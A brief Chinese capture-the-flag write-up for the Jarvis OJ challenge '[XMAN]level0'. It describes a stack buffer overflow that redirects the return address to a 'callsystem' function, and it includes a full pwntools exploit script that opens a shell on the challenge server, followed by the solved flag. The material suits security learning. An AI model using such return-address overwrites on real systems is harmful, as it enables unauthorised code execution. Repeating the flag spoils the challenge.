1. 程式人生 > >18.9.18 Jarvis OJ PWN----[XMAN]level0

18.9.18 Jarvis OJ PWN----[XMAN]level0

拖進IDA

看到有函式callsystem,那就直接把主函式往它身上引

在vulnerable裡有緩衝區,試著溢位

ebp偏移量0x80個位元組,覆蓋後再用8個位元組覆蓋儲存的ebp,然後將返回地址設為callsystem函式的地址

指令碼

#coding=utf-8
from pwn import *
#conn=process('./[XMAN]level0')
conn=remote('pwn2.jarvisoj.com',9881)
addr=0x0000000000400596                       #callsystem_addr
payload='a'*0x80+'a'*0x08+p64(addr)
conn.recvuntil("Hello, World\n")
conn.sendline(payload)
conn.interactive()


#CTF{713ca3944e92180e0ef03171981dcd41}